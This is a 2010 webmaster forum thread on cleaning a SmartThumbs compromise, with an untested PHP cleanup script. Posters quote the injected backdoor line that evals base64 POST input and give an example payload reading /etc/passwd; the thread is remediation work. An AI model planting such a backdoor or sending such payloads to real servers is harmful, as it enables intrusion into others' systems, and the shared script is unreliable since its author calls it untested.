removing ST exploit - GoFuckYourself.com

MMarko · 05-08-2010, 06:39 AM

I wrote simple tutorial how to remove ST exploit and check if you're affected with it... because it looks like still many ST installs are infected and are not cleaned. I think update will not clean it... you have to do it manually...

Remove SmartThumbs exploit in 5 steps

boneless · 05-08-2010, 06:50 AM

i read it and got a small question:

it says if you got the include line and the base64 line then youre still infected.

i only got this one:
@eval(base64_decode($_POST[qxp]));//';

does that mean im not infected, or still infected?

boneless · 05-08-2010, 06:55 AM

damn just found the other line as well, except it aint including sesa.tmp but webcam.tmp.

should i show the post you made to my sys admin and have them take care of it? or do it myself, as i dont have access to phpmyadmin. my host normally does that type of stuff.

is there any other way besides phpmyadmin to do this?

MMarko · 05-08-2010, 08:06 AM

you're infected for sure

well... you need something which will allow you to edit entries in mysql tables... so phpmyadmin or anything else capable to edit table values

k0nr4d · 05-08-2010, 08:20 AM

untested (might not work at all. i dont have ST, and i just wrote it based on the instructions in the blog post). I take no responsibility if it breaks something, use at your own risk.

PHP Code:


			
<?php
$dbserver = '';
$dbuser = ''; 
$dbpass = ''; 
$dbname = ''; 
$dblink = mysql_connect($dbserver,$dbuser,$dbpass);
mysql_select_db($dbname,$dblink);

copy("st/admin/variables.php","tmp/variables.bak"); 
$string = file_get_contents("st/admin/variables.php");
$string = str_replace("@eval(base64_decode($_POST[qxp]));//’;","",$string); 
file_put_contents("st/admin/variables.php",$string);
unlink("/tmp/sesa.tmp");
unlink("/tmp/webcam.tmp");
include('st/admin/variables.php'); 
mysql_query("UPDATE st_settings SET niche = '$niche'");
exit("Done"); 
?>

grumpy · 05-08-2010, 08:24 AM

Quote:

Originally Posted by k0nr4d

untested (might not work at all. i dont have ST, and i just wrote it based on the instructions in the blog post). I take no responsibility if it breaks something, use at your own risk.

PHP Code:


			
<?php

$dbserver = '';

$dbuser = ''; 

$dbpass = ''; 

$dbname = ''; 

$dblink = mysql_connect($dbserver,$dbuser,$dbpass);

mysql_select_db($dbname,$dblink);



copy("st/admin/variables.php","tmp/variables.bak"); 

$string = file_get_contents("st/admin/variables.php");

$string = str_replace("@eval(base64_decode($_POST[qxp]));//?;","",$string); 

file_put_contents("st/admin/variables.php",$string);

unlink("/tmp/sesa.tmp");

unlink("/tmp/webcam.tmp");

include('st/admin/variables.php'); 

mysql_query("UPDATE st_settings SET niche = '$niche'");

exit("Done"); 

?>

$niche is undefined

k0nr4d · 05-08-2010, 08:26 AM

Quote:

Originally Posted by grumpy

$niche is undefined

Sure it is, its including the variables.php file before inserting it

PXN · 05-08-2010, 09:25 AM

nice stuff. Thanks for sharing.

MMarko · 05-08-2010, 04:50 PM

Code:

$dbserver = '';
$dbuser = ''; 
$dbpass = ''; 
$dbname = '';

you should include st/classes/mysql.php before that... and remove those lines completely...

however I'd suggest that you manually take a look at those files so you double check everything and avoid any major fuckup...

rowan · 05-08-2010, 06:32 PM

Quote:

Originally Posted by boneless

i read it and got a small question:

it says if you got the include line and the base64 line then youre still infected.

i only got this one:
@eval(base64_decode($_POST[qxp]));//';

does that mean im not infected, or still infected?

FYI that little bit of code executes whatever is passed in variable 'qxp'

So they could post something like qxp=cat%20/etc/passwd (display the contents of the password file)

Davy · 05-09-2010, 02:05 AM

Quote:

Originally Posted by boneless

@eval(base64_decode($_POST[qxp]));

Holy shit. Who in the right state of mind would add such a code to their product? Yikes!

CyberHustler · 05-09-2010, 02:14 AM

LoveSandra · 05-09-2010, 06:19 AM

wtf.......................

nation-x · 05-09-2010, 07:29 AM

Quote:

Originally Posted by Davy

Holy shit. Who in the right state of mind would add such a code to their product? Yikes!

uuuuuhhhhh wut??

Davy · 05-09-2010, 08:09 AM

Quote:

Originally Posted by nation-x

uuuuuhhhhh wut??

This thread is about a security exploit. I thought the info above was the security hole.

u-Bob · 05-09-2010, 08:18 AM

if you box was compromised, there's only 1 thing to do: reinstall everything.

MMarko · 05-13-2010, 03:12 AM

lol, yes and for every wordpress exploit everyone should reinstall whole box :D

don't be silly

u-Bob · 05-13-2010, 04:44 AM

Quote:

Originally Posted by MMarko

lol, yes and for every wordpress exploit everyone should reinstall whole box :D

simple answer: yes.

Shoplifter · 05-13-2010, 12:40 PM

Bumping this to the top. I think this exploit is not getting the attention it deserves.

We cleaned a number of sites and in some case the exploit was back in 3 hours.

Tulku · 05-13-2010, 01:39 PM

Bumping ..

05-08-2010, 06:39 AM	#1
MMarko Confirmed User Join Date: Jun 2007 Posts: 160	removing ST exploit I wrote simple tutorial how to remove ST exploit and check if you're affected with it... because it looks like still many ST installs are infected and are not cleaned. I think update will not clean it... you have to do it manually... Remove SmartThumbs exploit in 5 steps __________________ dlXer - web design, developing, managed hosting, website optimizations

05-08-2010, 06:50 AM	#2
boneless Confirmed User Industry Role: Join Date: Dec 2002 Location: in your head Posts: 3,625	i read it and got a small question: it says if you got the include line and the base64 line then youre still infected. i only got this one: @eval(base64_decode($_POST[qxp]));//'; does that mean im not infected, or still infected? __________________ icq:148573096 skype:dabone2 email:boneless(a)mgpteam(.)com

05-08-2010, 06:55 AM	#3
boneless Confirmed User Industry Role: Join Date: Dec 2002 Location: in your head Posts: 3,625	damn just found the other line as well, except it aint including sesa.tmp but webcam.tmp. should i show the post you made to my sys admin and have them take care of it? or do it myself, as i dont have access to phpmyadmin. my host normally does that type of stuff. is there any other way besides phpmyadmin to do this? __________________ icq:148573096 skype:dabone2 email:boneless(a)mgpteam(.)com

05-08-2010, 08:06 AM	#4
MMarko Confirmed User Join Date: Jun 2007 Posts: 160	you're infected for sure well... you need something which will allow you to edit entries in mysql tables... so phpmyadmin or anything else capable to edit table values __________________ dlXer - web design, developing, managed hosting, website optimizations

05-08-2010, 08:20 AM	#5
k0nr4d Confirmed User Industry Role: Join Date: Aug 2006 Location: Poland Posts: 9,231	untested (might not work at all. i dont have ST, and i just wrote it based on the instructions in the blog post). I take no responsibility if it breaks something, use at your own risk. PHP Code: <?php $dbserver = ''; $dbuser = ''; $dbpass = ''; $dbname = ''; $dblink = mysql_connect($dbserver,$dbuser,$dbpass); mysql_select_db($dbname,$dblink); copy("st/admin/variables.php","tmp/variables.bak"); $string = file_get_contents("st/admin/variables.php"); $string = str_replace("@eval(base64_decode($_POST[qxp]));//’;","",$string); file_put_contents("st/admin/variables.php",$string); unlink("/tmp/sesa.tmp"); unlink("/tmp/webcam.tmp"); include('st/admin/variables.php'); mysql_query("UPDATE st_settings SET niche = '$niche'"); exit("Done"); ?> __________________ Mechanical Bunny Media Mechbunny Tube Script \| Mechbunny Webcam Aggregator Script \| Custom Web Development Last edited by k0nr4d; 05-08-2010 at 08:23 AM..

05-08-2010, 09:25 AM	#8
PXN Confirmed User Join Date: Jun 2008 Posts: 1,548	nice stuff. Thanks for sharing.

05-08-2010, 04:50 PM	#9
MMarko Confirmed User Join Date: Jun 2007 Posts: 160	Code: $dbserver = ''; $dbuser = ''; $dbpass = ''; $dbname = ''; you should include st/classes/mysql.php before that... and remove those lines completely... however I'd suggest that you manually take a look at those files so you double check everything and avoid any major fuckup... __________________ dlXer - web design, developing, managed hosting, website optimizations Last edited by MMarko; 05-08-2010 at 04:52 PM..

05-09-2010, 02:14 AM	#12
CyberHustler Masterbaiter Industry Role: Join Date: Feb 2006 Posts: 28,510	__________________ “If you can convince the lowest white man he’s better than the best colored man, he won’t notice you’re picking his pocket. Hell, give him somebody to look down on, and he’ll empty his pockets for you.”

05-09-2010, 06:19 AM	#13
LoveSandra So Fucking Banned Join Date: Aug 2008 Location: Just Blow Me Posts: 10,551	wtf.......................

05-09-2010, 08:18 AM	#16
u-Bob there's no $$$ in porn Industry Role: Join Date: Jul 2005 Location: icq: 195./568.-230 (btw: not getting offline msgs) Posts: 33,063	if you box was compromised, there's only 1 thing to do: reinstall everything.

05-13-2010, 03:12 AM	#17
MMarko Confirmed User Join Date: Jun 2007 Posts: 160	lol, yes and for every wordpress exploit everyone should reinstall whole box :D don't be silly __________________ dlXer - web design, developing, managed hosting, website optimizations

05-13-2010, 12:40 PM	#19
Shoplifter Richest man in Babylon Industry Role: Join Date: Jan 2002 Location: Posts: 10,002 Posts: 5,816	Bumping this to the top. I think this exploit is not getting the attention it deserves. We cleaned a number of sites and in some case the exploit was back in 3 hours.

05-13-2010, 01:39 PM	#20
Tulku Confirmed User Join Date: Aug 2003 Location: Porn Town Posts: 672	Bumping ..